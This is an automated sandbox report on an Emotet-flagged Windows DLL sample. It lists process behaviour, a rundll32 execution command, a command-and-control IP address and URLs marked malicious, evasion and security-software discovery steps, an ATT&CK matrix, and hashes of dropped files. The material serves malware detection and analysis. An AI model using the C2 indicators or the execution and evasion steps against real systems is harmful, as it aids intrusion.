                      Source: svchost.exe, 0000000B.00000002.757908430.000001E536202000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: rundll32.exe, 00000004.00000002.240780829.000002BE35808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: svchost.exe, 00000017.00000002.405484969.0000021A88E99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                      Source: svchost.exe, 0000000B.00000002.757994647.000001E53623C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.757980753.0000014B13A29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB96550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFFEFB96550
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB97BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,2_2_00007FFFEFB97BE8
                      Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB9D318 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFFEFB9D318
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB96550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFFEFB96550
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB920E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFFEFB920E0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe | Network Connect: 23.239.0.12 443
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1
Source: C:\Windows\System32\regsvr32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\regsvr32.exe | Code function: EnumSystemLocalesA, 2_2_00007FFFEFB9C7F4
Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA, 2_2_00007FFFEFB9DF98
Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoA, 2_2_00007FFFEFB9C39C
Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoW, 2_2_00007FFFEFB9DF20
Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoW, 2_2_00007FFFEFB9DF3C
Source: C:\Windows\System32\regsvr32.exe | Code function: _getptd,GetLocaleInfoA, 2_2_00007FFFEFB9C6E4
Source: C:\Windows\System32\regsvr32.exe | Code function: _getptd,GetLocaleInfoA, 2_2_00007FFFEFB9C2B4
Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoA, 2_2_00007FFFEFB9E1E8
Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 2_2_00007FFFEFB9C16C
Source: C:\Windows\System32\regsvr32.exe | Code function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s, 2_2_00007FFFEFB9C934
Source: C:\Windows\System32\regsvr32.exe | Code function: EnumSystemLocalesA, 2_2_00007FFFEFB9C8C8
Source: C:\Windows\System32\regsvr32.exe | Code function: EnumSystemLocalesA, 2_2_00007FFFEFB9C834
Source: C:\Windows\System32\regsvr32.exe | Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 2_2_00007FFFEFB9C450
Source: C:\Windows\System32\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00007FFFEFB94558 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 2_2_00007FFFEFB94558
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00007FFFEFB9E6C0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 2_2_00007FFFEFB9E6C0

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: svchost.exe, 00000011.00000002.758054301.000001DC41F02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Files%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000011.00000002.758013989.000001DC41E51000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Source: svchost.exe, 00000011.00000002.758054301.000001DC41F02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 5.2.regsvr32.exe.620000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.14e051b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.2be35aa0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.ca0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.14e051b0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.2be35aa0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.regsvr32.exe.620000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.758443733.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.243462226.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.240757372.0000014E051B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.240813581.000002BE35AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
ATT&CK matrix, listed by tactic (numeric prefixes are kept as shown in the report):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 1 Windows Management Instrumentation; 2 Native API; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
Defense Evasion: 21 Masquerading; 1 Disable or Modify Tools; 3 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Hidden Files and Directories; 1 Obfuscated Files or Information; 1 Regsvr32; 1 Rundll32; 1 DLL Side-Loading; 1 File Deletion
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 51 Security Software Discovery; 3 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Remote System Discovery; 2 File and Directory Discovery; 34 System Information Discovery; Network Service Scanning; System Network Connections Discovery; Process Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Command and Control: 11 Encrypted Channel; 2 Ingress Tool Transfer; 1 Non-Application Layer Protocol; 2 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact
Behavior Graph (ID: 626476, Sample: Ns2al4764F, Startdate: 14/05/2022, Architecture: WINDOWS, Score: 80)

• Start node signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Yara detected Emotet
• loaddll64.exe started regsvr32.exe, cmd.exe, rundll32.exe and a second rundll32.exe; svchost.exe, a second svchost.exe and 10 other processes also started
• svchost.exe: Changes security center settings (notifications, updates, antivirus, firewall); started MpCmdRun.exe, which started conhost.exe
• DNS/IP: 127.0.0.1 unknown unknown (svchost.exe); 192.168.2.1 unknown unknown (other processes)
• regsvr32.exe: Hides that the sample has been downloaded from the Internet (zone.identifier); started a second regsvr32.exe
• rundll32.exe started by cmd.exe: Hides that the sample has been downloaded from the Internet (zone.identifier)
• Second regsvr32.exe: System process connects to network (likely due to code injection or exploit); connects to 23.239.0.12, 443, 49764 LINODE-APLinodeLLCUS United States
Source | Detection | Scanner | Label
Ns2al4764F.dll | 35% | Virustotal |
No Antivirus matches
Source | Detection | Scanner | Label
4.2.rundll32.exe.2be35aa0000.1.unpack | 100% | Avira | HEUR/AGEN.1215493
5.2.regsvr32.exe.620000.1.unpack | 100% | Avira | HEUR/AGEN.1215493
2.2.regsvr32.exe.ca0000.0.unpack | 100% | Avira | HEUR/AGEN.1215493
3.2.rundll32.exe.14e051b0000.1.unpack | 100% | Avira | HEUR/AGEN.1215493
No Antivirus matches
Source | Detection | Scanner | Label
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
https://%s.xboxlive.com | 0% | URL Reputation | safe
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
https://dynamic.t | 0% | URL Reputation | safe
https://www.pango.co/privacy | 0% | URL Reputation | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe
https://23.239.0.12/C | 100% | Avira URL Cloud | malware
https://23.239.0.12/ | 0% | URL Reputation | safe
https://23.239.0.12/#mWwn | 100% | Avira URL Cloud | malware
https://23.239.0.12/D | 100% | Avira URL Cloud | malware
http://help.disneyplus.com. | 0% | URL Reputation | safe
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
https://23.239.0.12/ | true | URL Reputation: safe | unknown
                                                          high
                                                          https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000F.00000003.313031098.000001521A249000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000F.00000003.291233892.000001521A231000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000F.00000002.313395907.000001521A25C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000017.00000003.379214403.0000021A8979B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000F.00000002.313364509.000001521A242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313096828.000001521A241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://dynamic.tsvchost.exe, 0000000F.00000002.313431355.000001521A264000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.hotspotshield.com/terms/svchost.exe, 00000017.00000003.375973507.0000021A897CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.375914924.0000021A89796000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376057932.0000021A89C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376000317.0000021A897B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.pango.co/privacysvchost.exe, 00000017.00000003.375973507.0000021A897CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.375914924.0000021A89796000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376057932.0000021A89C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376000317.0000021A897B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://disneyplus.com/legal.svchost.exe, 00000017.00000003.379214403.0000021A8979B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000F.00000002.313352467.000001521A23A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.291233892.000001521A231000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://23.239.0.12/Cregsvr32.exe, 00000005.00000002.758040549.0000000000561000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000F.00000002.313395907.000001521A25C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://23.239.0.12/#mWwnregsvr32.exe, 00000005.00000002.758040549.0000000000561000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmptrue
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            https://activity.windows.comsvchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.bingmapsportal.comsvchost.exe, 0000000F.00000002.313306707.000001521A213000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://23.239.0.12/Dregsvr32.exe, 00000005.00000003.314249030.000000000058B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.758256280.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314276869.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://help.disneyplus.com.svchost.exe, 00000017.00000003.379214403.0000021A8979B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://%s.dnet.xboxlive.comsvchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    low
                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000F.00000003.313031098.000001521A249000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
IP | Domain | Country | ASN | ASN Name | Malicious
23.239.0.12 | unknown | United States | 63949 | LINODE-AP Linode LLC, US | true

Private IPs:
192.168.2.1
127.0.0.1
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 626476
Start date and time: 14/05/2022 04:20:12 (2022-05-14 04:20:12 +02:00)
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 8s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Ns2al4764F (renamed file extension from none to dll)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 34
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.troj.evad.winDLL@27/6@0/3
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 48
• Number of non-executed functions: 218
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.223.24.244
• Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
04:21:55 | API Interceptor | 11x Sleep call for process: svchost.exe modified
04:22:47 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
Match | Associated Sample Name / URL | Detection | Context
23.239.0.12 | 56vvRzZVQI.dll | malicious |
| 8PnsJpuSdb.dll | malicious |
| yaEOuyT3Sg.dll | malicious |
| bsST3VDo8G.dll | malicious |
| wdxJNuEzAd.dll | malicious |
| yaEOuyT3Sg.dll | malicious |
| bsST3VDo8G.dll | malicious |
| 6ez8Bx2x6f.dll | malicious |
| 2Bgxulf6QF.dll | malicious |
| sEfyaa5VPQ.dll | malicious |
| 40Gbs8Qkm6.dll | malicious |
| wdxJNuEzAd.dll | malicious |
| c63rCWoXA0.dll | malicious |
| okkVJeYYLQ.dll | malicious |
| kd5oAYcBC1.dll | malicious |
| 3xB7n07o8r.dll | malicious |
| TODvFfngca.dll | malicious |
| 6ez8Bx2x6f.dll | malicious |
| 2Bgxulf6QF.dll | malicious |
| sEfyaa5VPQ.dll | malicious |
No context
Match | Associated Sample Name / URL | Detection | Context
LINODE-AP Linode LLC, US | 56vvRzZVQI.dll | malicious | 23.239.0.12
| 8PnsJpuSdb.dll | malicious | 23.239.0.12
| yaEOuyT3Sg.dll | malicious | 23.239.0.12
| bsST3VDo8G.dll | malicious | 23.239.0.12
| wdxJNuEzAd.dll | malicious | 23.239.0.12
| yaEOuyT3Sg.dll | malicious | 23.239.0.12
| bsST3VDo8G.dll | malicious | 23.239.0.12
| 6ez8Bx2x6f.dll | malicious | 23.239.0.12
| 2Bgxulf6QF.dll | malicious | 23.239.0.12
| sEfyaa5VPQ.dll | malicious | 23.239.0.12
| 40Gbs8Qkm6.dll | malicious | 23.239.0.12
| wdxJNuEzAd.dll | malicious | 23.239.0.12
| c63rCWoXA0.dll | malicious | 23.239.0.12
| okkVJeYYLQ.dll | malicious | 23.239.0.12
| kd5oAYcBC1.dll | malicious | 23.239.0.12
| 3xB7n07o8r.dll | malicious | 23.239.0.12
| TODvFfngca.dll | malicious | 23.239.0.12
| 6ez8Bx2x6f.dll | malicious | 23.239.0.12
| 2Bgxulf6QF.dll | malicious | 23.239.0.12
| sEfyaa5VPQ.dll | malicious | 23.239.0.12
Match | Associated Sample Name / URL | Detection | Context
51c64c77e60f3980eea90869b68c58a8 | 56vvRzZVQI.dll | malicious | 23.239.0.12
| 8PnsJpuSdb.dll | malicious | 23.239.0.12
| yaEOuyT3Sg.dll | malicious | 23.239.0.12
| bsST3VDo8G.dll | malicious | 23.239.0.12
| wdxJNuEzAd.dll | malicious | 23.239.0.12
| yaEOuyT3Sg.dll | malicious | 23.239.0.12
| bsST3VDo8G.dll | malicious | 23.239.0.12
| 6ez8Bx2x6f.dll | malicious | 23.239.0.12
| 2Bgxulf6QF.dll | malicious | 23.239.0.12
| sEfyaa5VPQ.dll | malicious | 23.239.0.12
| 40Gbs8Qkm6.dll | malicious | 23.239.0.12
| wdxJNuEzAd.dll | malicious | 23.239.0.12
| c63rCWoXA0.dll | malicious | 23.239.0.12
| okkVJeYYLQ.dll | malicious | 23.239.0.12
| kd5oAYcBC1.dll | malicious | 23.239.0.12
| 3xB7n07o8r.dll | malicious | 23.239.0.12
| TODvFfngca.dll | malicious | 23.239.0.12
| 6ez8Bx2x6f.dll | malicious | 23.239.0.12
| 2Bgxulf6QF.dll | malicious |
                                                                                                                              • 23.239.0.12
                                                                                                                              sEfyaa5VPQ.dllGet hashmaliciousBrowse
                                                                                                                              • 23.239.0.12
                                                                                                                              No context
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 0.3593198815979092
Encrypted: false
SSDEEP: 12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
MD5: BF1DC7D5D8DAD7478F426DF8B3F8BAA6
SHA1: C6B0BDE788F553F865D65F773D8F6A3546887E42
SHA-256: BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
SHA-512: 00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
Malicious: false
                                                                                                                              Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\svchost.exe
File Type: MPEG-4 LOAS
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.24943050410255635
Encrypted: false
SSDEEP: 1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4qgv:BJiRdwfu2SRU4qgv
MD5: D6A80BDC6229BD9EFD7958800C3EC64F
SHA1: 379206562C6444E3BF5BAAD55DF65D5DF69CA871
SHA-256: 39FBE9E3409B42EC7A4EF67D8E282F8BB82A997CC57DB8AA05AA64D63C01AF79
SHA-512: D8E51BBF26905FF137F30D5B2151014B62FD277D4A43453E5E06F3809FACAD63E50D65C588E2949D18603BBA3F09074B22E0DFB2D9411D8D28DEACBF8905672B
Malicious: false
                                                                                                                              Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\svchost.exe
